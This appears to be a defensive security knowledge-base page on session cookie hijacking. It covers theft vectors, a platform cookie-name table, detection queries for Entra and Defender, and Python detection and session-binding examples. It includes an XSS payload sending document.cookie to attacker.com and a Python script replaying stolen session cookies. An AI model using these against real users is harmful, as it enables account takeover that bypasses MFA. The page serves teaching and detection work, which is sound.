Session Hijacking
ATT&CK: T1539 — Steal Web Session Cookie, T1185 — Browser Session Hijacking
Session hijacking involves stealing authenticated browser cookies and replaying them to impersonate the victim's authenticated session — bypassing both credentials and MFA. As MFA adoption increases, session cookie theft (rather than credential theft) is the dominant initial access vector in BEC and SaaS compromise.
The Core Mechanism
Every time a user authenticates to a web application, the application issues a session cookie:
User authenticates (password + MFA)
↓
Server creates session: session_id = random_value
↓
Cookie set: Set-Cookie: session=<value>; Secure; HttpOnly; SameSite=Strict
↓
Browser sends cookie with every request
↓
Server validates cookie → identifies user
Stealing the cookie = stealing the authenticated session. The server cannot distinguish a legitimate browser from a cookie-replaying attacker.
Theft Vectors
1. Infostealer Malware (Primary Vector)
Infostealers (Raccoon, RedLine, Vidar, Lumma, META) are the dominant cookie theft method:
- Extract cookies from browser databases (%LocalAppData%\Google\Chrome\User Data\Default\Cookies)
- Export to C2 infrastructure
- Logs sold on dark web marketplaces (Russian Market, 2easy, Genesis Market)
Infostealer infection (malvertising, phishing, cracked software)
↓
Extract browser cookies from Chrome/Firefox/Edge profiles
↓
Exfiltrate cookie databases to C2
↓
Sell on dark web marketplace
↓
Buyer imports cookies → authenticated SaaS session
Scale: Genesis Market (seized 2023) had 1.5M+ compromised device logs available for purchase.
2. AiTM (Adversary-in-the-Middle) Phishing
See AiTM Phishing.
Reverse proxy captures cookies in real-time during authentication. The attacker's proxy intercepts the post-MFA session cookie.
3. XSS (Cross-Site Scripting)
If an application has XSS vulnerabilities:
// XSS payload to exfiltrate session cookie
<script>
new Image().src = "https://attacker.com/steal?c=" + document.cookie;
</script>
HttpOnly flag prevents JavaScript access to cookies marked as such — but many apps still have non-HttpOnly cookies.
4. Network Interception (Legacy / Misconfigured)
HTTP (non-HTTPS) traffic allows cookie interception. Rare in modern SaaS but still present in some enterprise internal applications.
Replaying Stolen Cookies
Browser-Based Replay
// Chrome DevTools → Application → Cookies → Edit/Add
// Import cookie values directly into browser
// Navigate to the application → authenticated as victim
Script-Based Replay
import requests
# Stolen cookie
cookies = {
'session': 'stolen_session_value',
'ESTSAUTH': 'm365_session_cookie',
'okta-token-storage': 'okta_session_json'
}
# Access protected resource as victim
r = requests.get('https://myapp.example.com/dashboard', cookies=cookies)
print(r.text)
Chrome Extension / Cookie Editor
Browser extensions (Cookie Editor, EditThisCookie) allow direct import of cookie JSON exports from infostealer logs.
Platform-Specific Session Cookies
| Platform | Cookie Name | Notes |
|---|---|---|
| Microsoft 365 (Entra) | ESTSAUTH, ESTSAUTHPERSISTENT | ESTSAUTHPERSISTENT persists across browser closes |
| Okta | sid, DT | Okta session identifier |
| Google Workspace | GAPS, SSID, HSID | Google auth cookies |
| Salesforce | sid | Salesforce session ID |
| GitHub | user_session, __Host-user_session_same_site | |
| Slack | d=xxxx | Workspace session |
| AWS Console | aws-creds | Console session (not API access) |
Detection
Entra ID — Token Anomalies
// Detect session cookie replay from different IP/device than original auth
SigninLogs
| where RiskEventTypes_V2 has_any ("anonymizedIPAddress", "unfamiliarFeatures", "aiTMAttack")
| project TimeGenerated, UserPrincipalName, IPAddress, RiskLevel, DeviceDetail
// Impossible travel: same user signed in successfully from two different countries within an hour
let sessions = SigninLogs
| where ResultType == 0
| project UserPrincipalName, TimeGenerated, IPAddress, Country = tostring(LocationDetails.countryOrRegion), CorrelationId;
sessions
| join kind=inner sessions on UserPrincipalName
| where TimeGenerated < TimeGenerated1   // each pair once, and never a row joined to itself
| where Country != Country1
| where abs(datetime_diff("minute", TimeGenerated, TimeGenerated1)) < 60   // abs(): the diff is signed
| project UserPrincipalName, Country, Country1, TimeGenerated, TimeGenerated1
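The impossible-travel logic of the query above, reimplemented in Python as an added example (not part of the original page) so it can be run offline over constructed sample sign-in records; the record keys mirror the SigninLogs columns the query uses and every value is invented.

```python
from datetime import datetime, timedelta
from itertools import combinations

# Constructed sample sign-in records (invented, not real log data); the keys
# mirror the SigninLogs columns the query uses. result 0 = successful sign-in.
SAMPLE_SIGNINS = [
    {"user": "alice@example.com", "time": "2024-05-01T09:00:00", "ip": "203.0.113.10", "country": "GB", "result": 0},
    {"user": "alice@example.com", "time": "2024-05-01T09:25:00", "ip": "198.51.100.7", "country": "US", "result": 0},
    {"user": "bob@example.com", "time": "2024-05-01T10:00:00", "ip": "203.0.113.20", "country": "GB", "result": 0},
    {"user": "bob@example.com", "time": "2024-05-01T14:00:00", "ip": "198.51.100.9", "country": "US", "result": 0},
    {"user": "carol@example.com", "time": "2024-05-01T11:00:00", "ip": "192.0.2.5", "country": "DE", "result": 50126},
    {"user": "carol@example.com", "time": "2024-05-01T11:10:00", "ip": "192.0.2.6", "country": "FR", "result": 0},
]


def impossible_travel(signins, window_minutes=60):
    """Return (user, earlier, later) for each pair of successful sign-ins by
    the same user from two different countries within window_minutes."""
    window = timedelta(minutes=window_minutes)
    by_user = {}
    for s in signins:
        if s["result"] != 0:  # same filter as `where ResultType == 0`
            continue
        by_user.setdefault(s["user"], []).append(s)
    hits = []
    for user, events in by_user.items():
        events.sort(key=lambda e: datetime.fromisoformat(e["time"]))
        # Self-join equivalent: every pair of the user's sign-ins, each pair once,
        # ordered so the gap is never negative.
        for earlier, later in combinations(events, 2):
            gap = datetime.fromisoformat(later["time"]) - datetime.fromisoformat(earlier["time"])
            if earlier["country"] != later["country"] and gap < window:
                hits.append((user, earlier, later))
    return hits


if __name__ == "__main__":
    for user, a, b in impossible_travel(SAMPLE_SIGNINS):
        print(f"{user}: {a['country']} {a['time']} -> {b['country']} {b['time']} ({a['ip']} -> {b['ip']})")
```

On the sample data only alice is flagged (GB then US 25 minutes apart); bob's two countries are four hours apart and carol's first sign-in failed, so neither pair qualifies.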
Endpoint — Infostealer Signals
- Access to browser cookie database files (the Cookies SQLite file) from an unexpected process
- Chrome/Firefox cookie file read by non-browser process
- Network beaconing to known infostealer C2 IPs
- Suspicious child process of browser (Chromium DLL injection)
// Defender for Endpoint — cookie database access from non-browser process
DeviceFileEvents
| where FileName == "Cookies"
| where FolderPath has "Google\\Chrome\\User Data"
| where InitiatingProcessFileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe")
| project TimeGenerated, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine
Defenses Against Session Hijacking
| Control | Effectiveness |
|---|---|
| Continuous Access Evaluation (CAE) | Revokes tokens mid-session when IP/device changes — effective against replay from different location |
| Conditional Access: Compliant Device | Session from non-compliant device is rejected even with valid cookie |
| Token Binding | Cryptographically binds token to TLS session — theoretically prevents replay; low deployment |
| Short session lifetimes | Stolen cookies expire sooner; limits attack window |
| Infostealer detection on endpoint | EDR detects browser data access by malware |
| HttpOnly + Secure + SameSite=Strict | Mitigates XSS-based theft; does not stop malware |
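An added example (not the page's or any vendor's code) of a minimal server-side session store that ties the issuance flow from The Core Mechanism to three rows of the table: a random session id issued with the HttpOnly/Secure/SameSite flags, a short lifetime, and a device-context check that revokes the session when the same cookie arrives from a different client, in the spirit of CAE and compliant-device policies. The fingerprint inputs, the 15-minute TTL and the store itself are assumptions for illustration.

```python
import hashlib
import hmac
import secrets
import time

SESSION_TTL = 15 * 60  # short session lifetime in seconds (assumed value)


def client_fingerprint(ip: str, user_agent: str, device_id: str) -> str:
    # Hypothetical stand-in for compliant-device / CAE signals: a hash of the
    # client context the session was issued to.
    return hashlib.sha256(f"{ip}|{user_agent}|{device_id}".encode()).hexdigest()


def set_cookie_header(sid: str) -> str:
    # The cookie flags from the issuance flow, plus Max-Age matching the TTL.
    return f"session={sid}; Secure; HttpOnly; SameSite=Strict; Path=/; Max-Age={SESSION_TTL}"


class SessionStore:
    """In-memory store binding each session id to its client context and expiry."""

    def __init__(self):
        self._sessions = {}

    def create(self, user, ip, user_agent, device_id, now=None):
        now = time.time() if now is None else now
        sid = secrets.token_urlsafe(32)  # random, unguessable session id
        self._sessions[sid] = {
            "user": user,
            "fp": client_fingerprint(ip, user_agent, device_id),
            "expires": now + SESSION_TTL,
        }
        return sid

    def validate(self, sid, ip, user_agent, device_id, now=None):
        """Return (user, None) if the cookie is honoured, else (None, reason)."""
        now = time.time() if now is None else now
        sess = self._sessions.get(sid)
        if sess is None:
            return None, "unknown_session"
        if now >= sess["expires"]:
            del self._sessions[sid]
            return None, "expired"
        if not hmac.compare_digest(sess["fp"], client_fingerprint(ip, user_agent, device_id)):
            # Same cookie from a different client context: treat it as replay and
            # revoke the whole session, so both holders are signed out and the
            # mismatch can be alerted on.
            del self._sessions[sid]
            return None, "context_mismatch_revoked"
        return sess["user"], None
```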
Cross-Links
| Topic | Link |
|---|---|
| AiTM Phishing | aitm-phishing |
| MFA Technologies | mfa-technologies |
| Entra Identity Protection | identity-protection |
| OAuth App Abuse | oauth-app-abuse |